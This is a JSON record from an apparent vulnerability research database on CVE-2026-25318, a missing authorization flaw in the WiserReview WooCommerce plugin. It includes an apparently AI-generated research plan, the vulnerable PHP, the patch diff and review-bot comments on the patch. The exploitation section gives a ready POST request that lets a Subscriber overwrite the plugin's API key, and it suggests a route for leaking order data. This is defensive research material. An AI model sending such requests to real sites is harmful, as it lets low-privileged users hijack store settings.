[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f-WJ_3lGCBC-wmsRJ1xYjZc-ID9ZjyqUOogBZpgtEiF8":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":25,"research_verified":26,"research_rounds_completed":27,"research_plan":28,"research_summary":29,"research_vulnerable_code":30,"research_fix_diff":31,"research_exploit_outline":32,"research_model_used":33,"research_started_at":34,"research_completed_at":35,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":26,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":26,"source_links":36},"CVE-2026-25318","wiserreview-product-reviews-for-woocommerce-missing-authorization","WiserReview Product Reviews for WooCommerce \u003C= 2.9 - Missing Authorization","The WiserReview Product Reviews for WooCommerce plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 2.9. 
This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform an unauthorized action.","wiser-review",null,"\u003C=2.9","3.0","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-01-26 00:00:00","2026-05-04 15:20:57",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F7ee6ca74-3684-46df-9b42-e97ee8cdbdb8?source=api-prod",99,[22,23,24],"assets\u002Fjs\u002Fwiserw-js.js","readme.txt","wiser-review.php","researched",false,3,"# Vulnerability Research Plan: CVE-2026-25318 (WiserReview Missing Authorization)\n\n## Vulnerability Summary\nThe WiserReview Product Reviews for WooCommerce plugin (versions \u003C= 2.9) contains a missing authorization vulnerability within its AJAX settings saving mechanism. The function `wiserrw_ajax_save_settings` is registered via the `wp_ajax_` hook but lacks any capability checks (e.g., `current_user_can('manage_options')`) or nonce verification. This allows any authenticated user, including those with Subscriber-level permissions, to overwrite the plugin's configuration options.\n\n## Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action:** `wiserrw_save_settings`\n- **Method:** `POST`\n- **Parameters:** `wiserrw_data` (An array of settings to be saved).\n- **Required Authentication:** Subscriber-level (or any logged-in user).\n- **Vulnerability Type:** Missing Authorization and Missing CSRF Protection.\n\n## Code Flow\n1. **Entry Point:** The AJAX action is registered in `wiser-review.php`:\n   ```php\n   add_action( 'wp_ajax_wiserrw_save_settings', 'wiserrw_ajax_save_settings' );\n   ```\n2. 
**Vulnerable Function:** The request is handled by `wiserrw_ajax_save_settings()` in `wiser-review.php`:\n   ```php\n   function wiserrw_ajax_save_settings() {\n       \u002F\u002F No current_user_can() check here\n       \u002F\u002F No check_ajax_referer() or wp_verify_nonce() check here\n       $wiserrw_data = isset( $_POST['wiserrw_data'] ) ? array_map( 'sanitize_text_field', wp_unslash( $_POST['wiserrw_data'] ) ) : array();\n       update_option( 'wiserrw_api_settings', $wiserrw_data ); \u002F\u002F SINK: Updates global plugin settings\n\n       wp_send_json_success( array(\n           'message' => 'Settings saved.',\n           'saved'   => $wiserrw_data,\n       ) );\n   }\n   ```\n3. **Sink:** The `update_option` function writes the user-provided array directly into the database option `wiserrw_api_settings`.\n\n## Nonce Acquisition Strategy\nAnalysis of `wiserrw_ajax_save_settings()` in `wiser-review.php` shows that **no nonce is verified** on the server side. Although `wiser-review.php` localizes a nonce named `nonce` (action: `wiserrw_save_settings`) and `wiserrw_ajax_var.wiserrw_security` (action: `wiserrw_export_orders_nonce`), the actual handler for `wiserrw_save_settings` fails to check it.\n\n**Conclusion:** No nonce is required for exploitation.\n\n## Exploitation Strategy\n1. **Authentication:** Log in as a Subscriber user to obtain a session cookie.\n2. **Payload Construction:** Create a POST request with the `action` set to `wiserrw_save_settings` and `wiserrw_data` containing arbitrary configuration values.\n3. **Request Details:**\n   - **URL:** `http:\u002F\u002Flocalhost:8888\u002Fwp-admin\u002Fadmin-ajax.php`\n   - **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n   - **Body:** `action=wiserrw_save_settings&wiserrw_data[wiserrw_api_key]=PWNED_API_KEY&wiserrw_data[wiserrw_live_mode_checkbox]=1`\n4. **Tool:** Use `http_request` (Playwright) to send the authenticated POST request.\n\n## Test Data Setup\n1. 
**User Creation:**\n   ```bash\n   wp user create attacker attacker@example.com --role=subscriber --user_pass=password\n   ```\n2. **Initial State Check:**\n   ```bash\n   wp option get wiserrw_api_settings\n   ```\n   (Note: This might be empty or return an error if not set yet).\n\n## Expected Results\n- The server should respond with a JSON success message: `{\"success\":true,\"data\":{\"message\":\"Settings saved.\",\"saved\":{\"wiserrw_api_key\":\"PWNED_API_KEY\",\"wiserrw_live_mode_checkbox\":\"1\"}}}`.\n- The `wiserrw_api_settings` option in the WordPress database will be updated with the malicious values.\n\n## Verification Steps\n1. **Database Check:** Run the following WP-CLI command to verify the option was changed:\n   ```bash\n   wp option get wiserrw_api_settings --format=json\n   ```\n   Expect output: `{\"wiserrw_api_key\":\"PWNED_API_KEY\",\"wiserrw_live_mode_checkbox\":\"1\"}`.\n\n## Alternative Approaches\nIf the plugin validates the keys within the `wiserrw_data` array (though the source code doesn't show this), attempt to use existing keys identified from the plugin's frontend or JS:\n- `wiserrw_product_review_enabled`\n- `wiserrw_product_card_enabled`\n- `wiserrw_duration`\n\nIf the `wiserrw_export_orders` action also lacks authorization, it could be used to leak order information. That function is mentioned in the JS:\n- **Action:** `wiserrw_export_orders`\n- **Security Check:** `wiserrw_security` (Nonce action: `wiserrw_export_orders_nonce`).\n- **Strategy:** If this handler also lacks `current_user_can`, find where `wiserrw_export_orders_nonce` is exposed (likely the admin settings page), extract it via `browser_eval`, and trigger an export. However, the primary target is the settings overwrite as it is a direct \"Missing Authorization\" on a critical function.","The WiserReview Product Reviews for WooCommerce plugin (up to version 2.9) fails to implement capability checks or nonce verification in its AJAX settings saving handler. 
This allows any authenticated user, including those with low-level Subscriber permissions, to overwrite the plugin's global configuration and API settings.","\u002F\u002F wiser-review.php:59\nfunction wiserrw_ajax_save_settings() {\n\t$wiserrw_data = isset( $_POST['wiserrw_data'] ) ? array_map( 'sanitize_text_field', wp_unslash( $_POST['wiserrw_data'] ) ) : array();\n\tupdate_option( 'wiserrw_api_settings', $wiserrw_data );\n\n\twp_send_json_success( array(\n\t\t'message' => 'Settings saved.',\n\t\t'saved'   => $wiserrw_data,\n\t) );\n}\nadd_action( 'wp_ajax_wiserrw_save_settings', 'wiserrw_ajax_save_settings' );","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwiser-review\u002F2.9\u002Fassets\u002Fjs\u002Fwiserw-js.js \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwiser-review\u002F3.0\u002Fassets\u002Fjs\u002Fwiserw-js.js\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwiser-review\u002F2.9\u002Fassets\u002Fjs\u002Fwiserw-js.js\t2025-10-16 20:08:12.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwiser-review\u002F3.0\u002Fassets\u002Fjs\u002Fwiserw-js.js\t2026-02-03 06:00:56.000000000 +0000\n@@ -105,7 +105,7 @@\n         $.ajax({\n             type : 'POST',\n             url : ajaxurl,\n-            data : $form.serialize() + '&action=wiserrw_save_settings',\n+            data : $form.serialize() + '&action=wiserrw_save_settings&nonce=' + wiserrw_ajax_var.nonce,\n             success: function (res) {\n                 const $toggle = $current_chek.closest('.wiserrw_toggle');\n                 let $msg = $toggle.find('.wiserrw_saved_msg');\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwiser-review\u002F2.9\u002Fwiser-review.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwiser-review\u002F3.0\u002Fwiser-review.php\n--- 
\u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwiser-review\u002F2.9\u002Fwiser-review.php\t2025-11-19 14:08:56.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwiser-review\u002F3.0\u002Fwiser-review.php\t2026-02-03 06:00:56.000000000 +0000\n@@ -57,6 +57,20 @@\n add_action( 'admin_enqueue_scripts', 'wiserrw_scripts' );\n \n function wiserrw_ajax_save_settings() {\n+\t\u002F\u002F Verify nonce for security\n+\tif ( ! isset( $_POST['nonce'] ) || ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['nonce'] ) ), 'wiserrw_save_settings' ) ) {\n+\t\twp_send_json_error( array(\n+\t\t\t'message' => 'Security check failed.',\n+\t\t), 403 );\n+\t}\n+\n+\t\u002F\u002F Check user capabilities\n+\tif ( ! current_user_can( 'manage_options' ) ) {\n+\t\twp_send_json_error( array(\n+\t\t\t'message' => 'Unauthorized access.',\n+\t\t), 403 );\n+\t}\n+\n \t$wiserrw_data = isset( $_POST['wiserrw_data'] ) ? array_map( 'sanitize_text_field', wp_unslash( $_POST['wiserrw_data'] ) ) : array();\n \tupdate_option( 'wiserrw_api_settings', $wiserrw_data );","To exploit this vulnerability, an attacker first logs into the WordPress site with any authenticated account (e.g., a Subscriber). They then issue a POST request to the `\u002Fwp-admin\u002Fadmin-ajax.php` endpoint with the `action` parameter set to `wiserrw_save_settings`. The payload should include a `wiserrw_data` array containing malicious configuration values, such as a custom `wiserrw_api_key`. 
Since the server-side function `wiserrw_ajax_save_settings` does not check for user capabilities or verify a security nonce, the plugin's global option `wiserrw_api_settings` will be updated with the attacker-supplied data, effectively hijacking the plugin's connection to the WiserReview platform.","gemini-3-flash-preview","2026-05-05 00:17:54","2026-05-05 00:18:16",{"type":37,"vulnerable_version":38,"fixed_version":11,"vulnerable_browse":39,"vulnerable_zip":40,"fixed_browse":41,"fixed_zip":42,"all_tags":43},"plugin","2.9","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwiser-review\u002Ftags\u002F2.9","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwiser-review.2.9.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwiser-review\u002Ftags\u002F3.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwiser-review.3.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwiser-review\u002Ftags"]
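Review bot: in the `wiserw-js.js` hunk (@@ -105,7 +105,7 @@) the nonce is spliced into the request body by string concatenation (`'&nonce=' + wiserrw_ajax_var.nonce`), so if `wiserrw_ajax_var` is not localized on a page that enqueues this script the request sends the literal string `undefined` and the new server check fails with a 403 that the `success` callback never sees. Suggest reading the value defensively and passing it as a field in the `data` object so jQuery URL-encodes it, and adding an `error` handler so a rejected save is surfaced to the user instead of failing silently.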
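Review bot: in the `wiser-review.php` hunk (@@ -57,6 +57,20 @@) the added `wp_verify_nonce` and `current_user_can( 'manage_options' )` checks close the missing-authorization issue, but `$wiserrw_data` is still written to `wiserrw_api_settings` with whatever keys the client supplies, so even an administrator request can store arbitrary option keys. Suggest restricting the saved array to the known setting names the plugin uses (e.g. `wiserrw_api_key`, `wiserrw_live_mode_checkbox`) before `update_option`, and consider `check_ajax_referer( 'wiserrw_save_settings', 'nonce' )` as the more idiomatic replacement for the manual `isset`/`wp_verify_nonce` pair, keeping the explicit 403 JSON error if the front end depends on it.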